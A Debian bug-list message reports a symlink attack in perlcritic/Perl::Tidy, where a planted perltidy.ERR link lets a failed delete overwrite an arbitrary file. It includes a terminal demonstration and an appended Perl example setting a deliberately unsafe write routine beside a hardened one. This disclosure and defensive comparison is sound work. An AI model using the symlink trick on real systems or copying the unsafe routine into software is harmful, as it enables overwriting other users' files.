Bug#834213: perlcritic: some code causes a perltidy.ERR file to be created or overwritten
Jakub Wilk
jwilk at jwilk.net
Sun May 14 14:55:09 UTC 2017
Control: tags -1 + security
* Paul Wise <pabs at debian.org>, 2016-08-13, 15:09:
>There is some code which causes perlcritic to create or overwrite a
>perltidy.ERR file in the current directory.
Perl::Tidy tries to delete existing perltidy.ERR; but if deleting fails, it
proceeds as if nothing happened. This can be abused to overwrite arbitrary
files via symlink attack:
$ tar -xvvf 834213.tar.gz
dr-xr-xr-x root/root 0 2017-05-14 16:33 834213/
-r--r--r-- root/root 2 2017-05-14 16:30 834213/badsyntax.pm
lr-xr-xr-x root/root 0 2017-05-14 16:30 834213/perltidy.ERR -> /tmp/moo
$ cd 834213
$ head -n1 /tmp/moo
head: cannot open '/tmp/moo' for reading: No such file or directory
$ perlcritic --noprofile -1 badsyntax.pm
perltidy had errors!! at line 1, column 1. See page 33 of PBP. (Severity: 1)
Module does not end with "1;" at line 1, column 1. Must end with a recognizable true value. (Severity: 4)
Code not contained in explicit package at line 1, column 1. Violates encapsulation. (Severity: 4)
No package-scoped "$VERSION" variable found at line 1, column 1. See page 404 of PBP. (Severity: 2)
Code before strictures are enabled at line 1, column 1. See page 429 of PBP. (Severity: 5)
Code before warnings are enabled at line 1, column 1. See page 431 of PBP. (Severity: 4)
$ head -n1 /tmp/moo
1: final indentation level: 1
--
Jakub Wilk
-------------- next part --------------
A non-text attachment was scrubbed...
Name: 834213.tar.gz
Type: application/gzip
Size: 190 bytes
Desc: not available
URL: <http://lists.alioth.debian.org/pipermail/pkg-perl-maintainers/attachments/20170514/114800e2/attachment.bin>
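The pattern the report describes, shown as an added Perl example (this is not code from Perl::Tidy, perlcritic, or the reporter): an "unlink, then open for writing" routine that ignores a failed unlink, next to a hardened routine that aborts when the stale file cannot be removed and creates the new file with O_EXCL|O_NOFOLLOW so an entry already at that path is rejected rather than followed. The subroutine names, the scratch-directory layout under File::Temp, the "victim" file and the written message are constructed for the demonstration; it assumes a POSIX system whose Fcntl provides O_NOFOLLOW.

```perl
#!/usr/bin/perl
# Added example, not code from Perl::Tidy or perlcritic: the unsafe
# "unlink, then open '>'" pattern next to a hardened version that stops when
# the stale file cannot be removed and creates the new one with O_EXCL|O_NOFOLLOW.
use strict;
use warnings;
use Errno qw(ENOENT);
use Fcntl qw(O_WRONLY O_CREAT O_EXCL O_NOFOLLOW);
use File::Spec;
use File::Temp qw(tempdir);

# Unsafe pattern: the result of unlink is ignored, and '>' follows a symlink
# left at $path, so whatever it points at gets truncated and overwritten.
sub write_err_unsafe {
    my ($path, $msg) = @_;
    unlink $path;
    open my $fh, '>', $path or return 0;
    print {$fh} $msg;
    close $fh;
    return 1;
}

# Hardened pattern: a leftover that cannot be removed (any error other than
# "does not exist") aborts, and the new file is created atomically with
# O_EXCL, so an existing entry, symlink or not, is rejected rather than used.
sub write_err_safe {
    my ($path, $msg) = @_;
    if (!unlink($path) && $! != ENOENT) {
        warn "refusing to write $path: cannot remove stale file: $!\n";
        return 0;
    }
    sysopen(my $fh, $path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644) or do {
        warn "refusing to write $path: $!\n";
        return 0;
    };
    print {$fh} $msg;
    close $fh;
    return 1;
}

# Constructed scenario mirroring the report: a read-only directory holding a
# perltidy.ERR symlink that points at a file the writer should never touch.
my $scratch = tempdir(CLEANUP => 1);
my $victim  = File::Spec->catfile($scratch, 'victim');
my $errdir  = File::Spec->catdir($scratch, 'readonly');
my $errfile = File::Spec->catfile($errdir, 'perltidy.ERR');
mkdir $errdir or die "mkdir $errdir: $!";

sub reset_scenario {
    chmod 0755, $errdir;
    unlink $errfile;
    open my $v, '>', $victim or die "open $victim: $!";
    print {$v} "original\n";
    close $v;
    symlink $victim, $errfile or die "symlink: $!";
    chmod 0555, $errdir;    # as in the report; unlink now fails unless run as root
}

sub slurp {
    my ($path) = @_;
    open my $fh, '<', $path or die "open $path: $!";
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

for my $case ([unsafe => \&write_err_unsafe], [safe => \&write_err_safe]) {
    my ($name, $writer) = @$case;
    reset_scenario();
    my $ok = $writer->($errfile, "1: final indentation level: 1\n");
    chmod 0755, $errdir;    # let tempdir's CLEANUP remove the directory
    printf "%-6s wrote=%d victim=%s", $name, $ok, slurp($victim);
}
```

Run as an unprivileged user, the unsafe routine reports success while the victim file's contents have been replaced; the safe routine refuses because unlink fails with a permission error, and the victim is untouched. Run as root, the read-only directory no longer blocks unlink, so both routines replace the symlink with a regular file; the O_EXCL|O_NOFOLLOW create still closes the window between the unlink and the open in which a symlink could be planted.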